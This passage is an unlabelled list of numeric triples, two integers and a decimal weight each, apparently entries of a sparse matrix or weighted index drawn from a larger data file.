(247, 274, 0.81669),
(254, 274, 0.81669),
(255, 274, 0.81669),
(256, 274, 0.81669),
(257, 274, 0.81669),
(262, 274, 0.81669),
(264, 274, 0.81669),
(265, 274, 0.81669),
(266, 274, 0.81669),
(269, 274, 0.81669),
(270, 274, 0.81669),
(272, 274, 0.81669),
(274, 274, 0.81669),
(280, 274, 0.81669),
(288, 274, 0.81669),
(290, 274, 0.81669),
(301, 274, 0.81669),
(305, 274, 0.81669),
(31, 274, 1.63338),
(159, 274, 1.63338),
(160, 274, 1.63338),
(250, 274, 1.63338),
(251, 274, 1.63338),
(261, 274, 1.63338),
(263, 274, 1.63338),
(267, 274, 1.63338),
(268, 274, 1.63338),
(178, 274, 2.45007),
(240, 274, 2.45007),
(306, 274, 2.45007),
(236, 274, 3.26676),
(241, 274, 3.26676),
(193, 274, 4.90014),
(258, 274, 4.90014),
(31, 275, 0.91),
(159, 275, 0.91),
(160, 275, 0.91),
(250, 275, 0.91),
(251, 275, 0.91),
(255, 275, 0.91),
(256, 275, 0.91),
(267, 275, 0.91),
(269, 275, 0.91),
(193, 275, 1.82),
(241, 275, 1.82),
(31, 276, 0.91),
(159, 276, 0.91),
(160, 276, 0.91),
(178, 276, 0.91),
(236, 276, 0.91),
(250, 276, 0.91),
(251, 276, 0.91),
(306, 276, 0.91),
(258, 276, 2.73),
(31, 277, 0.86331),
(159, 277, 0.86331),
(160, 277, 0.86331),
(250, 277, 0.86331),
(251, 277, 0.86331),
(31, 278, 0.93331),
(159, 278, 0.93331),
(160, 278, 0.93331),
(250, 278, 0.93331),
(251, 278, 0.93331),
(31, 279, 0.84),
(159, 279, 0.84),
(160, 279, 0.84),
(241, 279, 0.84),
(248, 279, 0.84),
(249, 279, 0.84),
(250, 279, 0.84),
(251, 279, 0.84),
(256, 279, 0.84),
(263, 279, 0.84),
(306, 279, 2.52),
(257, 279, 3.36),
(31, 280, 0.95669),
(159, 280, 0.95669),
(160, 280, 0.95669),
(250, 280, 0.95669),
(251, 280, 0.95669),
(306, 281, 0.5334),
(308, 281, 0.5334),
(31, 281, 0.85344),
(159, 281, 0.85344),
(160, 281, 0.85344),
(161, 281, 0.85344),
(168, 281, 0.85344),
(174, 281, 0.85344),
(178, 281, 0.85344),
(193, 281, 0.85344),
(233, 281, 0.85344),
(235, 281, 0.85344),
(236, 281, 0.85344),
(237, 281, 0.85344),
(238, 281, 0.85344),
(239, 281, 0.85344),
(240, 281, 0.85344),
(241, 281, 0.85344),
(242, 281, 0.85344),
(243, 281, 0.85344),
(244, 281, 0.85344),
(245, 281, 0.85344),
(246, 281, 0.85344),
(247, 281, 0.85344),
(248, 281, 0.85344),
(249, 281, 0.85344),
(250, 281, 0.85344),
(251, 281, 0.85344),
(252, 281, 0.85344),
(253, 281, 0.85344),
(254, 281, 0.85344),
(255, 281, 0.85344),
(256, 281, 0.85344),
(257, 281, 0.85344),
(258, 281, 0.85344),
(259, 281, 0.85344),
(260, 281, 0.85344),
(261, 281, 0.85344),
(262, 281, 0.85344),
(263, 281, 0.85344),
(264, 281, 0.85344),
(265, 281, 0.85344),
(266, 281, 0.85344),
(267, 281, 0.85344),
(268, 281, 0.85344),
(269, 281, 0.85344),
(270, 281, 0.85344),
(272, 281, 0.85344),
(273, 281, 0.85344),
(274, 281, 0.85344),
(275, 281, 0.85344),
(280, 281, 0.85344),
(287, 281, 0.85344),
(288, 281, 0.85344),
(290, 281, 0.85344),
(292, 281, 0.85344),
(294, 281, 0.85344),
(295, 281, 0.85344),
(298, 281, 0.85344),
(299, 281, 0.85344),
(301, 281, 0.85344),
(304, 281, 0.85344),
(305, 281, 0.85344),
(31, 287, 0.15996),
(287, 287, 0.15996),
(306, 287, 0.2666),
(308, 287, 0.2666),
(159, 287, 0.42656),
(160, 287, 0.42656),
(161, 287, 0.42656),
(168, 287, 0.42656),
(174, 287, 0.42656),
(178, 287, 0.42656),
(193, 287, 0.42656),
(233, 287, 0.42656),
(235, 287, 0.42656),
(236, 287, 0.42656),
(237, 287, 0.42656),
(238, 287, 0.42656),
(239, 287, 0.42656),
(240, 287, 0.42656),
(241, 287, 0.42656),
(242, 287, 0.42656),
(243, 287, 0.42656),
(244, 287, 0.42656),
(245, 287, 0.42656),
(246, 287, 0.42656),
(247, 287, 0.42656),
(248, 287, 0.42656),
(249, 287, 0.42656),
(250, 287, 0.42656),
(251, 287, 0.42656),
(252, 287, 0.42656),
(253, 287, 0.42656),
(254, 287, 0.42656),
(255, 287, 0.42656),
(256, 287, 0.42656),
(257, 287, 0.42656),
(258, 287, 0.42656),
(259, 287, 0.42656),
(260, 287, 0.42656),
(261, 287, 0.42656),
(262, 287, 0.42656),
(263, 287, 0.42656),
(264, 287, 0.42656),
(265, 287, 0.42656),
(266, 287, 0.42656),
(267, 287, 0.42656),
(268, 287, 0.42656),
(269, 287, 0.42656),
(270, 287, 0.42656),
(272, 287, 0.42656),
(273, 287, 0.42656),
(274, 287, 0.42656),
(275, 287, 0.42656),
(280, 287, 0.42656),
(288, 287, 0.42656),
(290, 287, 0.42656),
(292, 287, 0.42656),
(294, 287, 0.42656),
(295, 287, 0.42656),
(298, 287, 0.42656),
(299, 287, 0.42656),
(301, 287, 0.42656),
(304, 287, 0.42656),
(305, 287, 0.42656),
(31, 288, 1.47996),
(287, 288, 1.47996),
(306, 288, 2.4666),
(308, 288, 2.4666),
(159, 288, 3.94656),
(160, 288, 3.94656),
(161, 288, 3.94656),
(168, 288, 3.94656),
(174, 288, 3.94656),
(178, 288, 3.94656),
(193, 288, 3.94656),
(233, 288, 3.94656),
(235, 288, 3.94656),
(236, 288, 3.94656),
(237, 288, 3.94656),
(238, 288, 3.94656),
(239, 288, 3.94656),
(240, 288, 3.94656),
(241, 288, 3.94656),
(242, 288, 3.94656),
(243, 288, 3.94656),
(244, 288, 3.94656),
(245, 288, 3.94656),
(246, 288, 3.94656),
(247, 288, 3.94656),
(248, 288, 3.94656),
(249, 288, 3.94656),
(250, 288, 3.94656),
(251, 288, 3.94656),
(252, 288, 3.94656),
(253, 288, 3.94656),
(254, 288, 3.94656),
(255, 288, 3.94656),
(256, 288, 3.94656),
(257, 288, 3.94656),
(258, 288, 3.94656),
(259, 288, 3.94656),
(260, 288, 3.94656),
(261, 288, 3.94656),
(262, 288, 3.94656),
(263, 288, 3.94656),
(264, 288, 3.94656),
(265, 288, 3.94656),
(266, 288, 3.94656),
(267, 288, 3.94656),
(268, 288, 3.94656),
(269, 288, 3.94656),
(270, 288, 3.94656),
(272, 288, 3.94656),
(273, 288, 3.94656),
(274, 288, 3.94656),
(275, 288, 3.94656),
(280, 288, 3.94656),
(288, 288, 3.94656),
(290, 288, 3.94656),
(292, 288, 3.94656),
(294, 288, 3.94656),
(295, 288, 3.94656),
(298, 288, 3.94656),
(299, 288, 3.94656),
(301, 288, 3.94656),
(304, 288, 3.94656),
(305, 288, 3.94656),
(262, 407, 0.18669),
(272, 407, 0.18669),
(280, 407, 0.18669),
(287, 407, 0.18669),
(292, 407, 0.18669),
(31, 407, 0.37338),
(159, 407, 0.37338),
(160, 407, 0.37338),
(250, 407, 0.37338),
(251, 407, 0.37338),
(259, 407, 0.37338),
(260, 407, 0.37338),
(239, 407, 0.45339),
(240, 407, 0.45339),
(242, 407, 0.45339),
(306, 407, 1.52019),
(262, 408, 0.86331),
(272, 408, 0.86331),
(280, 408, 0.86331),
(287, 408, 0.86331),
(292, 408, 0.86331),
(31, 408, 1.72662),
(159, 408, 1.72662),
(160, 408, 1.72662),
(250, 408, 1.72662),
(251, 408, 1.72662),
(259, 408, 1.72662),
(260, 408, 1.72662),
(31, 409, 1.09669),
(159, 409, 1.09669),
(160, 409, 1.09669),
(250, 409, 1.09669),
(251, 409, 1.09669),
(31, 410, 0.98),
(159, 410, 0.98),
(160, 410, 0.98),
(250, 410, 0.98),
(251, 410, 0.98),
(259, 410, 1.96),
(260, 410, 1.96),
(31, 411, 0.32669),
(250, 411, 0.32669),
(251, 411, 0.32669),
(31, 412, 0.95669),
(250, 412, 0.95669),
(251, 412, 0.95669),
(31, 413, 1.09669),
(250, 413, 1.09669),
(251, 413, 1.09669),
(31, 414, 0.32669),
(250, 414, 0.32669),
(251, 414, 0.32669),
(273, 414, 0.32669),
(31, 415, 1.02669),
(250, 415, 1.02669),
(251, 415, 1.02669),
(31, 416, 1.19),
(250, 416, 1.19),
(251, 416, 1.19),
(31, 417, 0.28),
(159, 417, 0.28),
(160, 417, 0.28),
(237, 417, 0.28),
(242, 417, 0.28),
(250, 417, 0.28),
(251, 417, 0.28),
(252, 417, 0.28),
(254, 417, 0.28),
(299, 417, 0.28),
(304, 417, 0.28),
(239, 417, 0.56),
(305, 417, 0.56),
(306, 417, 0.56),
(31, 418, 0.91),
(159, 418, 0.91),
(160, 418, 0.91),
(250, 418, 0.91),
(251, 418, 0.91),
(31, 419, 1.02669),
(159, 419, 1.02669),
(160, 419, 1.02669),
(250, 419, 1.02669),
(251, 419, 1.02669),
(31, 420, 0.28),
(160, 420, 0.28),
(240, 420, 0.28),
(250, 420, 0.28),
(251, 420, 0.28),
(31, 421, 0.93331),
(160, 421, 0.93331),
(250, 421, 0.93331),
(251, 421, 0.93331),
(31, 422, 1.09669),
(160, 422, 1.09669),
(250, 422, 1.09669),
(251, 422, 1.09669),
(31, 423, 0.32669),
(174, 423, 0.32669),
(250, 423, 0.32669),
(251, 423, 0.32669),
(31, 424, 1.05),
(250, 424, 1.05),
(251, 424, 1.05),
(31, 425, 1.14331),
(250, 425, 1.14331),
(251, 425, 1.14331),
(159, 1052, 0.28),
(160, 1052, 0.28),
(257, 1052, 0.28),
(159, 1053, 1.05),
(160, 1053, 1.05),
(159, 1054, 1.19),
(160, 1054, 1.19),
(159, 1055, 0.46669),
(160, 1055, 0.46669),
(159, 1056, 1.00331),
(160, 1056, 1.00331),
(159, 1057, 1.12),
(160, 1057, 1.12),
(235, 1058, 0.09331),
(236, 1058, 0.09331),
(238, 1058, 0.09331),
(247, 1058, 0.09331),
(255, 1058, 0.09331),
(268, 1058, 0.09331),
(272, 1058, 0.09331),
(280, 1058, 0.09331),
(159, 1058, 0.18662),
(160, 1058, 0.18662),
(239, 1058, 0.18662),
(263, 1058, 0.18662),
(292, 1058, 0.18662),
(168, 1058, 0.27993),
(242, 1058, 0.27993),
(249, 1058, 0.27993),
(254, 1058, 0.27993),
(257, 1058, 0.27993),
(259, 1058, 0.27993),
(260, 1058, 0.27993),
(265, 1058, 0.27993),
(266, 1058, 0.27993),
(273, 1058, 0.27993),
(241, 1058, 0.37324),
(243, 1058, 0.37324),
(246, 1058, 0.37324),
(261, 1058, 0.37324),
(267, 1058, 0.37324),
(304, 1058, 0.37324),
(240, 1058, 0.65317),
(269, 1058, 0.65317),
(178, 1058, 0.74648),
(306, 1058, 0.74648),
(299, 1058, 0.83979),
(193, 1058, 0.9331),
(252, 1058, 0.9331),
(305, 1058, 1.39965),
(265, 1059, 0.84),
(266, 1059, 0.84),
(268, 1059, 0.84),
(292, 1059, 0.84),
(304, 1059, 0.84),
(159, 1059, 1.68),
(160, 1059, 1.68),
(243, 1059, 1.68),
(259, 1059, 1.68),
(260, 1059, 1.68),
(306, 1059, 1.68),
(193, 1059, 5.04),
(305, 1059, 6.72),
(159, 1060, 0.98),
(160, 1060, 0.98),
(159, 1061, 0.98),
(160, 1061, 0.98),
(159, 1062, 0.98),
(160, 1062, 0.98),
(159, 1063, 0.23331),
(160, 1063, 0.23331),
(159, 1064, 0.88669),
(160, 1064, 0.88669),
(159, 1065, 0.98),
(160, 1065, 0.98),
(243, 1067, 0.37331),
(159, 1067, 0.63996),
(160, 1067, 0.63996),
(161, 1067, 0.63996),
(193, 1067, 0.63996),
(159, 1068, 0.28),
(160, 1068, 0.28),
(239, 1068, 0.28),
(249, 1068, 0.28),
(263, 1068, 0.28),
(305, 1068, 0.28),
(174, 1068, 0.56),
(235, 1068, 0.56),
(259, 1068, 0.56),
(260, 1068, 0.56),
(265, 1068, 0.56),
(266, 1068, 0.56),
(193, 1068, 0.84),
(254, 1068, 0.84),
(261, 1068, 0.84),
(159, 1069, 1.12),
(160, 1069, 1.12),
(159, 1070, 1.21331),
(160, 1070, 1.21331),
(159, 1071, 0.15996),
(160, 1071, 0.15996),
(159, 1072, 1.35996),
(160, 1072, 1.35996),
(159, 1073, 1.59996),
(160, 1073, 1.59996),
(159, 1074, 0.84),
(160, 1074, 0.84),
(174, 1074, 0.84),
(233, 1074, 0.84),
(237, 1074, 0.84),
(238, 1074, 0.84),
(245, 1074, 0.84),
(246, 1074, 0.84),
(252, 1074, 0.84),
(255, 1074, 0.84),
(263, 1074, 0.84),
(264, 1074, 0.84),
(269, 1074, 0.84),
(272, 1074, 0.84),
(280, 1074, 0.84),
(290, 1074, 0.84),
(298, 1074, 0.84),
(305, 1074, 0.84),
(308, 1074, 0.84),
(168, 1074, 1.68),
(243, 1074, 1.68),
(249, 1074, 1.68),
(254, 1074, 1.68),
(261, 1074, 1.68),
(265, 1074, 1.68),
(266, 1074, 1.68),
(268, 1074, 1.68),
(270, 1074, 1.68),
(299, 1074, 1.68),
(301, 1074, 1.68),
(304, 1074, 1.68),
(235, 1074, 2.52),
(256, 1074, 2.52),
(257, 1074, 2.52),
(262, 1074, 2.52),
(267, 1074, 2.52),
(273, 1074, 2.52),
(274, 1074, 2.52),
(275, 1074, 2.52),
(287, 1074, 2.52),
(244, 1074, 2.88),
(178, 1074, 3.36),
(253, 1074, 3.36),
(292, 1074, 3.36),
(306, 1074, 3.36),
(239, 1074, 4.2),
(240, 1074, 4.2),
(258, 1074, 4.2),
(193, 1074, 5.04),
(236, 1074, 5.04),
(259, 1074, 5.88),
(260, 1074, 5.88),
(242, 1074, 7.56),
(288, 1074, 7.56),
(159, 1075, 0.95669),
(160, 1075, 0.95669),
(288, 1075, 0.95669),
(304, 1076, 0.04662),
(305, 1076, 0.04662),
(299, 1076, 0.06993),
(159, 1076, 0.18669),
(160, 1076, 0.18669),
(174, 1076, 0.18669),
(193, 1076, 0.18669),
(235, 1076, 0.18669),
(244, 1076, 0.18669),
(245, 1076, 0.18669),
(249, 1076, 0.18669),
(252, 1076, 0.18669),
(253, 1076, 0.18669),
(254, 1076, 0.18669),
(258, 1076, 0.18669),
(267, 1076, 0.18669),
(274, 1076, 0.18669),
(239, 1076, 0.37338),
(242, 1076, 0.37338),
(256, 1076, 0.37338),
(257, 1076, 0.37338),
(269, 1076, 0.37338),
(290, 1076, 0.37338),
(237, 1076, 0.56007),
(240, 1076, 0.56007),
(241, 1076, 0.56007),
(259, 1076, 0.56007),
(260, 1076, 0.56007),
(263, 1076, 0.56007),
(268, 1076, 0.56007),
(288, 1076, 0.56007),
(272, 1076, 0.74676),
(280, 1076, 0.74676),
(159, 1077, 0.98),
(160, 1077, 0.98),
(159, 1078, 1.12),
(160, 1078, 1.12),
(159, 1112, 0.18669),
(160, 1112, 0.18669),
(263, 1112, 0.18669),
(288, 1112, 0.18669),
(299, 1112, 0.18669),
(306, 1112, 0.18669),
(159, 1113, 0.86331),
(160, 1113, 0.86331),
(159, 1114, 0.95669),
(160, 1114, 0.95669),
(159, 1115, 0.32669),
(160, 1115, 0.32669),
(235, 1115, 0.65338),
(159, 1116, 1.02669),
(160, 1116, 1.02669),
(159, 1117, 1.16669),
(160, 1117, 1.16669),
(161, 1355, 0.18669),
(250, 1355, 0.18669),
(251, 1355, 0.74676),
(161, 1394, 0.18669),
(241, 1394, 0.18669),
(265, 1394, 0.18669),
(266, 1394, 0.18669),
(274, 1394, 0.18669),
(288, 1394, 0.18669),
(240, 1394, 0.37338),
(254, 1394, 0.56007),
(161, 1420, 0.86331),
(295, 1420, 0.86331),
(299, 1420, 0.86331),
(161, 1426, 0.86331),
(193, 1426, 0.86331),
(238, 1426, 0.86331),
(244, 1426, 0.86331),
(249, 1426, 0.86331),
(257, 1426, 0.86331),
(262, 1426, 0.86331),
(264, 1426, 0.86331),
(267, 1426, 0.86331),
(269, 1426, 0.86331),
(270, 1426, 0.86331),
(301, 1426, 0.86331),
(240, 1426, 1.72662),
(247, 1426, 1.72662),
(253, 1426, 1.72662),
(259, 1426, 1.72662),
(260, 1426, 1.72662),
(265, 1426, 1.72662),
(266, 1426, 1.72662),
(306, 1426, 1.72662),
(233, 1426, 2.58993),
(252, 1426, 2.58993),
(304, 1426, 2.58993),
(161, 1427, 0.93331),
(193, 1427, 0.93331),
(240, 1427, 0.93331),
(253, 1427, 0.93331),
(262, 1427, 0.93331),
(264, 1427, 0.93331),
(247, 1427, 1.86662),
(252, 1427, 1.86662),
(304, 1427, 1.86662),
(174, 1428, 0.18669),
(235, 1428, 0.18669),
(236, 1428, 0.18669),
(264, 1428, 0.18669),
(275, 1428, 0.18669),
(299, 1428, 0.18669),
(161, 1428, 0.37338),
(161, 1466, 0.28),
(250, 1466, 0.28),
(251, 1466, 1.12),
(161, 1513, 0.23331),
(254, 1513, 0.23331),
(261, 1513, 0.23331),
(272, 1513, 0.23331),
(280, 1513, 0.23331),
(161, 1514, 0.88669),
(254, 1514, 0.88669),
(261, 1514, 0.88669),
(272, 1514, 0.88669),
(280, 1514, 0.88669),
(161, 1619, 0.32669),
(261, 1619, 0.32669),
(248, 2222, 0.37331),
(250, 2222, 0.63996),
(251, 2222, 0.63996),
(252, 2222, 0.63996),
(253, 2222, 0.63996),
(238, 2222, 0.74662),
(237, 2222, 0.90661),
(241, 2222, 0.90661),
(254, 2222, 1.54657),
(255, 2222, 1.54657),
(256, 2222, 1.54657),
(257, 2222, 1.54657),
(258, 2222, 1.54657),
(259, 2222, 1.54657),
(260, 2222, 1.54657),
(261, 2222, 1.54657),
(262, 2222, 1.54657),
(263, 2222, 1.54657),
(264, 2222, 1.54657),
(265, 2222, 1.54657),
(266, 2222, 1.54657),
(267, 2222, 1.54657),
(268, 2222, 1.54657),
(269, 2222, 1.54657),
(270, 2222, 1.54657),
(272, 2222, 1.54657),
(273, 2222, 1.54657),
(274, 2222, 1.54657),
(275, 2222, 1.54657),
(280, 2222, 1.54657),
(290, 2222, 1.54657),
(301, 2222, 1.54657),
(304, 2222, 1.54657),
(305, 2222, 1.54657),
(288, 2222, 1.91988),
(292, 2222, 1.91988),
(250, 2223, 1.76004),
(251, 2223, 1.76004),
(252, 2223, 1.76004),
(253, 2223, 1.76004),
(237, 2223, 2.49339),
(241, 2223, 2.49339),
(254, 2223, 4.25343),
(255, 2223, 4.25343),
(256, 2223, 4.25343),
(257, 2223, 4.25343),
(258, 2223, 4.25343),
(259, 2223, 4.25343),
(260, 2223, 4.25343),
(261, 2223, 4.25343),
(262, 2223, 4.25343),
(263, 2223, 4.25343),
(264, 2223, 4.25343),
(265, 2223, 4.25343),
(266, 2223, 4.25343),
(267, 2223, 4.25343),
(268, 2223, 4.25343),
(269, 2223, 4.25343),
(270, 2223, 4.25343),
(272, 2223, 4.25343),
(273, 2223, 4.25343),
(274, 2223, 4.25343),
(275, 2223, 4.25343),
(280, 2223, 4.25343),
(288, 2223, 4.25343),
(290, 2223, 4.25343),
(301, 2223, 4.25343),
(304, 2223, 4.25343),
(305, 2223, 4.25343),
(292, 2223, 5.28012),
(250, 2233, 0.95669),
(251, 2233, 3.82676),
(306, 2584, 0.28),
(168, 2584, 0.56),
(252, 2584, 0.56),
(299, 2584, 0.56),
(237, 2584, 1.6),
(241, 2584, 1.6),
(254, 2584, 1.6),
(255, 2584, 1.6),
(257, 2584, 1.6),
(258, 2584, 1.6),
(259, 2584, 1.6),
(260, 2584, 1.6),
(261, 2584, 1.6),
(263, 2584, 1.6),
(264, 2584, 1.6),
(267, 2584, 1.6),
(269, 2584, 1.6),
(272, 2584, 1.6),
(273, 2584, 1.6),
(275, 2584, 1.6),
(280, 2584, 1.6),
(290, 2584, 1.6),
(292, 2584, 1.6),
(304, 2584, 1.6),
(305, 2584, 1.6),
(238, 2584, 1.68),
(262, 2584, 1.88),
(265, 2584, 1.88),
(266, 2584, 1.88),
(268, 2584, 1.88),
(270, 2584, 1.88),
(274, 2584, 1.88),
(301, 2584, 1.88),
(237, 2585, 5.0668),
(241, 2585, 5.0668),
(254, 2585, 5.0668),
(255, 2585, 5.0668),
(257, 2585, 5.0668),
(258, 2585, 5.0668),
(259, 2585, 5.0668),
(260, 2585, 5.0668),
(261, 2585, 5.0668),
(262, 2585, 5.0668),
(263, 2585, 5.0668),
(264, 2585, 5.0668),
(265, 2585, 5.0668),
(266, 2585, 5.0668),
(267, 2585, 5.0668),
(268, 2585, 5.0668),
(269, 2585, 5.0668),
(270, 2585, 5.0668),
(272, 2585, 5.0668),
(273, 2585, 5.0668),
(274, 2585, 5.0668),
(275, 2585, 5.0668),
(280, 2585, 5.0668),
(290, 2585, 5.0668),
(292, 2585, 5.0668),
(301, 2585, 5.0668),
(304, 2585, 5.0668),
(305, 2585, 5.0668),
(241, 2586, 5.8668),
(255, 2586, 5.8668),
(257, 2586, 5.8668),
(258, 2586, 5.8668),
(259, 2586, 5.8668),
(260, 2586, 5.8668),
(261, 2586, 5.8668),
(262, 2586, 5.8668),
(263, 2586, 5.8668),
(264, 2586, 5.8668),
(265, 2586, 5.8668),
(266, 2586, 5.8668),
(267, 2586, 5.8668),
(268, 2586, 5.8668),
(269, 2586, 5.8668),
(270, 2586, 5.8668),
(272, 2586, 5.8668),
(273, 2586, 5.8668),
(274, 2586, 5.8668),
(275, 2586, 5.8668),
(280, 2586, 5.8668),
(290, 2586, 5.8668),
(292, 2586, 5.8668),
(301, 2586, 5.8668),
(304, 2586, 5.8668),
(305, 2586, 5.8668),
(236, 2825, 0.86331),
(240, 2825, 0.86331),
(241, 2825, 0.86331),
(242, 2825, 0.86331),
(246, 2825, 0.86331),
(247, 2825, 0.86331),
(248, 2825, 0.86331),
(253, 2825, 0.86331),
(254, 2825, 0.86331),
(259, 2825, 0.86331),
(260, 2825, 0.86331),
(263, 2825, 0.86331),
(272, 2825, 0.86331),
(280, 2825, 0.86331),
(298, 2825, 0.86331),
(306, 2825, 0.86331),
(308, 2825, 0.86331),
(239, 2825, 1.72662),
(243, 2825, 1.72662),
(252, 2825, 1.72662),
(261, 2825, 1.72662),
(269, 2825, 1.72662),
(193, 2825, 2.58993),
(238, 2825, 2.58993),
(235, 2825, 4.31655),
(250, 2825, 7.02981),
(242, 2879, 0.37331),
(263, 2879, 0.37331),
(305, 2879, 0.37331),
(252, 2879, 0.74662),
(160, 2879, 3.03981),
(240, 10343, 0.18669),
(242, 10343, 0.18669),
(249, 10343, 0.18669),
(268, 10343, 0.18669),
(272, 10343, 0.18669),
(280, 10343, 0.18669),
(250, 10343, 1.52019),
(31, 11550, 3.4666),
(298, 11551, 0.02331),
(299, 11551, 0.09324),
(168, 11551, 0.18669),
(246, 11551, 0.18669),
(248, 11551, 0.18669),
(249, 11551, 0.18669),
(254, 11551, 0.18669),
(308, 11551, 0.18669),
(301, 11551, 0.18981),
(304, 11551, 0.23643),
(305, 11551, 0.23643),
(174, 11551, 0.37338),
(236, 11551, 0.37338),
(238, 11551, 0.37338),
(239, 11551, 0.37338),
(240, 11551, 0.37338),
(287, 11551, 0.37338),
(256, 11551, 0.45339),
(288, 11551, 0.45339),
(237, 11551, 0.56007),
(243, 11551, 0.56007),
(245, 11551, 0.56007),
(306, 11551, 0.56007),
(235, 11551, 0.74676),
(242, 11551, 0.93345),
(244, 11551, 0.93345),
(31, 11551, 1.52019),
(265, 11551, 1.52019),
(266, 11551, 1.52019),
(270, 11551, 1.52019),
(193, 11551, 1.68021),
(241, 11551, 1.70688),
(259, 11551, 1.70688),
(260, 11551, 1.70688),
(267, 11551, 1.70688),
(268, 11551, 1.70688),
(272, 11551, 1.70688),
(280, 11551, 1.70688),
(255, 11551, 1.89357),
(258, 11551, 1.89357),
(261, 11551, 1.89357),
(263, 11551, 1.89357),
(269, 11551, 1.89357),
(273, 11551, 1.89357),
(274, 11551, 1.89357),
(178, 11551, 2.05359),
(262, 11551, 2.08026),
(275, 11551, 2.08026),
(290, 11551, 2.08026),
(292, 11551, 2.08026),
(257, 11551, 2.26695),
(264, 11551, 2.45364),
(268, 11552, 0.95669),
(31, 11552, 7.79019),
(193, 11553, 0.51331),
(268, 11553, 0.51331),
(31, 11553, 4.17981),
(31, 11554, 8.93019),
(31, 11555, 9.87981),
(31, 11556, 2.4),
(31, 11557, 3.2),
(238, 11578, 0.18669),
(243, 11578, 0.18669),
(287, 11578, 0.18669),
(305, 11578, 0.18669),
(242, 11578, 0.37338),
(254, 11578, 0.56007),
(160, 11578, 1.52019),
(168, 12608, 0.07),
(193, 12608, 0.07),
(240, 12608, 0.07),
(246, 12608, 0.07),
(248, 12608, 0.07),
(255, 12608, 0.07),
(267, 12608, 0.07),
(287, 12608, 0.07),
(304, 12608, 0.07),
(305, 12608, 0.07),
(178, 12608, 0.14),
(273, 12608, 0.14),
(45, 12608, 0.2),
(174, 12608, 0.21),
(242, 12608, 0.21),
(247, 12608, 0.35),
(252, 12608, 0.37),
(270, 12608, 0.57),
(301, 12608, 0.57),
(168, 12752, 0.18669),
(235, 12752, 0.18669),
(244, 12752, 0.18669),
(252, 12752, 0.18669),
(254, 12752, 0.18669),
(256, 12752, 0.18669),
(258, 12752, 0.18669),
(259, 12752, 0.18669),
(260, 12752, 0.18669),
(241, 12752, 0.56007),
(178, 12752, 0.74676),
(238, 12752, 1.52019),
(243, 12752, 1.70688),
(252, 12753, 0.86331),
(178, 12753, 1.72662),
(242, 12755, 0.32669),
(252, 12755, 0.65338),
(242, 12756, 0.98),
(252, 12756, 1.96),
(242, 12758, 1.07331),
(252, 12758, 1.07331),
(247, 12759, 0.51331),
(252, 12759, 1.02662),
(239, 12764, 0.32669),
(252, 12764, 0.32669),
(258, 12764, 0.32669),
(262, 12764, 0.32669),
(264, 12764, 0.32669),
(305, 12764, 0.32669),
(240, 12764, 1.63345),
(243, 12767, 0.23331),
(246, 12767, 0.23331),
(252, 12767, 0.23331),
(255, 12767, 0.23331),
(257, 12767, 0.23331),
(265, 12767, 0.23331),
(266, 12767, 0.23331),
(268, 12767, 0.23331),
(270, 12767, 0.23331),
(275, 12767, 0.23331),
(292, 12767, 0.23331),
(299, 12767, 0.23331),
(301, 12767, 0.23331),
(174, 12767, 0.46662),
(241, 12767, 0.46662),
(259, 12767, 0.46662),
(260, 12767, 0.46662),
(306, 12767, 0.46662),
(239, 12767, 0.69993),
(263, 12767, 0.69993),
(288, 12767, 0.69993),
(240, 12767, 0.93324),
(242, 12767, 1.86648),
(178, 12770, 0.14),
(238, 12770, 0.14),
(252, 12770, 0.14),
(269, 12770, 0.14),
(299, 12770, 0.14),
(304, 12770, 0.14),
(305, 12770, 0.14),
(306, 12770, 0.14),
(168, 12770, 0.28),
(244, 12770, 0.28),
(274, 12770, 0.28),
(168, 12783, 0.28),
(174, 12783, 0.28),
(238, 12783, 0.28),
(243, 12783, 0.28),
(259, 12783, 0.28),
(260, 12783, 0.28),
(269, 12783, 0.28),
(274, 12783, 0.28),
(290, 12783, 0.28),
(249, 12783, 0.56),
(267, 12783, 0.56),
(270, 12783, 0.56),
(292, 12783, 0.56),
(298, 12783, 0.56),
(301, 12783, 0.56),
(305, 12783, 0.56),
(308, 12783, 0.56),
(252, 12783, 0.68),
(240, 12783, 0.84),
(263, 12783, 0.84),
(306, 12783, 0.84),
(272, 12783, 1.12),
(280, 12783, 1.12),
(193, 12783, 1.96),
(288, 12783, 2.16),
(275, 12783, 2.24),
(247, 12783, 2.56),
(287, 12783, 3.08),
(252, 12785, 0.84),
(254, 12785, 0.84),
(178, 12785, 1.68),
(252, 12786, 0.95669),
(254, 12786, 0.95669),
(242, 12793, 0.81669),
(246, 12793, 0.81669),
(252, 12793, 0.81669),
(254, 12793, 0.81669),
(269, 12793, 0.81669),
(240, 12793, 1.63338),
(246, 12794, 0.86331),
(252, 12794, 0.86331),
(269, 12797, 0.86331),
(252, 12797, 1.72662),
(178, 12800, 0.86331),
(265, 12800, 0.86331),
(266, 12800, 0.86331),
(305, 12800, 0.86331),
(252, 12800, 1.72662),
(269, 12800, 1.72662),
(178, 12801, 0.93331),
(252, 12801, 1.86662),
(174, 12802, 0.23331),
(235, 12802, 0.23331),
(240, 12802, 0.23331),
(242, 12802, 0.23331),
(249, 12802, 0.23331),
(254, 12802, 0.23331),
(259, 12802, 0.23331),
(260, 12802, 0.23331),
(262, 12802, 0.23331),
(274, 12802, 0.23331),
(275, 12802, 0.23331),
(288, 12802, 0.23331),
(290, 12802, 0.23331),
(298, 12802, 0.23331),
(306, 12802, 0.23331),
(308, 12802, 0.23331),
(193, 12802, 0.46662),
(238, 12802, 0.46662),
(252, 12802, 0.46662),
(299, 12802, 0.46662),
(261, 12802, 0.93324),
(193, 12807, 0.18669),
(238, 12807, 0.18669),
(248, 12807, 0.18669),
(263, 12807, 0.18669),
(292, 12807, 0.18669),
(256, 12807, 0.37338),
(252, 12807, 0.74676),
(168, 12813, 0.18669),
(241, 12813, 0.18669),
(252, 12813, 0.18669),
(256, 12813, 0.18669),
(259, 12813, 0.18669),
(260, 12813, 0.18669),
(273, 12813, 0.18669),
(275, 12813, 0.18669),
(298, 12813, 0.18669),
(306, 12813, 0.18669),
(308, 12813, 0.18669),
(174, 12813, 0.37338),
(263, 12813, 0.37338),
(252, 12825, 0.93331),
(265, 12825, 0.93331),
(266, 12825, 0.93331),
(247, 12832, 0.86331),
(252, 12832, 0.86331),
(255, 12832, 0.86331),
(288, 12832, 1.72662),
(252, 12833, 0.93331),
(255, 12833, 0.93331),
(240, 12834, 0.86331),
(252, 12834, 0.86331),
(306, 12834, 0.86331),
(233, 12834, 1.72662),
(235, 12834, 1.72662),
(288, 12834, 1.72662),
(168, 12834, 4.31655),
